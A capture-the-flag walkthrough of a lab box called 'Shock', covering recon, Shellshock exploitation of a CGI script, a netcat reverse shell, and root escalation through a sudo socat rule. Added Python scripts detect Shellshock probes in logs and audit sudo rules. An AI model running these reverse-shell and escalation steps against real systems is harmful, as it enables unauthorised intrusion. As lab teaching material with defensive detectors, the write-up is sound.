# Shock

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-097d749cebd72974f19b283e9a48b1b38c804e8a%2Fimage.png?alt=media)

## Nmap

```
nmap 172.31.1.3 -p- -A

21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 12:ee:09:94:d5:4b:4a:d9:3b:95:3a:d6:63:e7:98:6f (RSA)
|   256 b9:f8:52:aa:62:02:af:6c:09:ca:dc:3e:7b:b3:94:b7 (ECDSA)
|_  256 53:5d:98:f7:61:e0:57:df:38:96:f9:be:59:77:6c:f4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Steak House Shock
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

## FTP

Looking at our Nmap results, we can start by checking whether the FTP server allows anonymous login.

```
nmap 172.31.1.3 --script=ftp-anon.nse -p 21

PORT   STATE SERVICE
21/tcp open  ftp
```

The script returns no output about anonymous login, so a manual check is required.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-1b2b6a45817b274501bd18dc7dd16b5841ed2320%2Fimage.png?alt=media)

Since anonymous login is not allowed on this server, we check for known exploits against vsFTPd 3.0.3 using searchsploit.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9441af4d7b303588b44ae2e3d37262df952312a4%2Fimage.png?alt=media)

I also searched Google and found no current exploits for vsFTPd 3.0.3. We can next take a look at HTTP on port 80, since this is our next best logical attack vector.

## HTTP

![http://172.31.1.3/](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-733fd159ac7aff30506096af0304f63ca7c036b1%2Fimage.png?alt=media)

I have also started a Nikto scan against this web server.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-8626b75aa3943fbeb4a6ed9d95f4878bffaa32b4%2Fimage.png?alt=media)

## Exploitation

Nikto reports that /cgi-bin/test.cgi may be vulnerable to Shellshock (CVE-2014-6271). A brief overview of the vulnerability is taken from [www.netsparker.com](https://www.netsparker.com/blog/web-security/cve-2014-6271-shellshock-bash-vulnerability-scan/).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c16992d1a0734c5871c71e97c0dd5a897256bff2%2Fimage.png?alt=media)
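On the defensive side, a Shellshock attempt against a CGI endpoint leaves a clear trace in the web server's access log, because the attacker-controlled header or query string that the CGI module exports as an environment variable starts with the bash function-definition prefix `() {`. The following Python script is an added example, not part of the original writeup or of any tool it mentions: it parses Apache "combined" format log lines (a format I assume here), URL-decodes the request, referer and user-agent fields, and flags lines carrying that prefix. The log lines are constructed samples, not output from the box.

```python
import re
from urllib.parse import unquote

# Signature of a Shellshock probe: a bash function definition "() {" placed in a
# value that a CGI handler exports into the environment (User-Agent, Referer,
# query string, ...). Whitespace between the tokens is optional, and payloads are
# sometimes URL-encoded, so every field is decoded before matching.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format (assumed):
#   host ident user [time] "request" status size "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)


def is_shellshock_payload(value: str) -> bool:
    """True if the value contains the bash function-definition prefix, URL-encoded or not."""
    return bool(SHELLSHOCK_RE.search(unquote(value)))


def scan_access_log(lines):
    """Return one finding per log line whose request, referer or user-agent carries the prefix."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = COMBINED_RE.match(line.rstrip("\n"))
        if not m:
            continue  # not combined format; skip rather than guess at the fields
        for field in ("request", "referer", "agent"):
            if is_shellshock_payload(m.group(field)):
                hits.append({
                    "line": lineno,
                    "src": m.group("host"),
                    "field": field,
                    "request": m.group("request"),
                })
                break  # one finding per line is enough
    return hits


# Constructed sample log lines (not from the target): a normal request, a probe in
# the User-Agent header, a URL-encoded probe in the query string, and a benign
# user-agent that contains parentheses but no function definition.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2020:13:55:36 +0000] "GET /index.html HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Oct/2020:13:56:01 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 512 "-" "() { :; }; /bin/echo probe"',
    '10.0.0.9 - - [10/Oct/2020:13:56:05 +0000] "GET /cgi-bin/test.cgi?x=%28%29%20%7B%20%3A%3B%7D%3B%20echo%20probe HTTP/1.1" 200 512 "-" "curl/7.68.0"',
    '10.0.0.7 - - [10/Oct/2020:13:57:10 +0000] "GET /menu.html HTTP/1.1" 200 1800 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['src']} sent a Shellshock pattern in {hit['field']} ({hit['request']})")
```

Run against a real `access.log` by replacing `SAMPLE_LOG` with `open(path)`. Decoding before matching matters: the third sample line would slip past a byte-exact match on `() {`. A match on a host that is patched still deserves attention, because it shows the endpoint is being probed; on an unpatched host the same pattern in the log is the indicator to start incident response from.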

### PoC

Searching for HTTP Shellshock PoCs brings us to the following by zalalov on GitHub.

{% embed url="https://github.com/zalalov/CVE-2014-6271" %}

Download the Python script and then set it up as per the README:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-7eaf214c62b89dee478dbcdf36875b8a79965d67%2Fimage.png?alt=media)

Start a netcat listener on the attacking machine.

```
nc -lvp 4444
```

Then call the Python script with the correct arguments for our machine.

```
python2 shellshock.py 172.31.1.3 /cgi-bin/test.cgi <AttackingIP>/4444
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a3730cc0a2a26a25c9f26ed3cb9445efa65375b2%2Fimage.png?alt=media)

After a short wait we should get a shell back on our listener.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-337bad1b7eaadbc0379c7152fd6d2670195abcac%2Fimage.png?alt=media)

From here we can upgrade the shell we currently have to one with a proper TTY.

```
/usr/bin/script -qc /bin/bash /dev/null
```

## Privilege Escalation

Next I uploaded linpeas.sh to look for any easy privilege escalation vectors. I started a Python SimpleHTTPServer on my attacking machine in the directory holding my Linux enumeration scripts.

```
python2 -m SimpleHTTPServer 80
```

I then fetched the file on the target with `wget`.

```
wget http://<IP>:<Port>/<File>
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-50433a48551871d77a2b8f0a051be4f4004b2416%2Fimage.png?alt=media)

Once the download finished, I ran linpeas.sh and waited for it to complete. Its output shows that we can run socat with sudo.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-11a9becf57de4fbbe7d1324097dd4b75a10a3f25%2Fimage.png?alt=media)

Looking up socat on [GTFObins](https://gtfobins.github.io/gtfobins/socat/), we see it can be used to spawn bash with root permissions.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-97c4f609b0a40a817e8d6a280940c2411357eea7%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-9b0862607b99ad32246888166426073bf8660f24%2Fimage.png?alt=media)

We are now root on the target machine.
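The root cause of this escalation is a sudo rule that grants a binary with a documented shell escape. The following Python script is an added example, not part of the original writeup or of linpeas or GTFOBins: it parses `sudo -l` style output and flags rules that grant `ALL` or a binary from a (partial, hand-picked) set of commands that GTFOBins documents as spawning a shell under sudo. The `sudo -l` text is a constructed sample, and the user and host names in it are hypothetical, not taken from the box.

```python
import os
import re

# Partial set of binaries that GTFOBins documents as giving a shell when run via
# sudo. Assumption: this list is hand-picked for the example and is not complete.
RISKY_BINARIES = {
    "socat", "bash", "sh", "vim", "vi", "less", "more", "find", "awk",
    "python", "python2", "python3", "perl", "env", "tar", "nmap", "man", "ftp", "git",
}

# One sudoers rule as `sudo -l` prints it:  (runas) [TAG: ...] command [args]
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+?)\s*$")


def parse_sudo_rules(text: str):
    """Return the rules listed after the 'may run the following commands' line."""
    rules, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        if not in_rules or not line.strip():
            continue
        m = RULE_RE.match(line)
        if not m:
            continue  # defaults/secure_path lines do not start with "("
        tags = m.group("tags").replace(" ", "")
        rules.append({
            "runas": m.group("runas").strip(),
            "nopasswd": "NOPASSWD:" in tags,
            "command": m.group("cmd"),
        })
    return rules


def audit_sudo_rules(rules, risky=RISKY_BINARIES):
    """Flag rules that are unrestricted or grant a binary with a known shell escape."""
    findings = []
    for rule in rules:
        cmd = rule["command"]
        if cmd == "ALL":
            findings.append({**rule, "reason": "unrestricted command set"})
            continue
        binary = os.path.basename(cmd.split()[0])
        if binary in risky:
            findings.append({**rule, "reason": f"{binary} has a shell escape documented on GTFOBins"})
    return findings


# Constructed `sudo -l` output in the layout sudo uses; user and host are hypothetical.
SAMPLE_SUDO_L = """\
Matching Defaults entries for www-data on example-host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User www-data may run the following commands on example-host:
    (ALL) NOPASSWD: /usr/bin/socat
    (root) /usr/sbin/reboot
    (ALL : ALL) ALL
"""

if __name__ == "__main__":
    for f in audit_sudo_rules(parse_sudo_rules(SAMPLE_SUDO_L)):
        pw = "NOPASSWD" if f["nopasswd"] else "password"
        print(f"({f['runas']}) {f['command']} [{pw}]: {f['reason']}")
```

Feed it the saved output of `sudo -l` (or walk `/etc/sudoers` and `/etc/sudoers.d/` with the same rule regex) on hosts you administer. The fix for a finding like the socat rule is to remove it or replace it with a wrapper script that takes no user-controlled arguments, rather than granting the whole binary.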
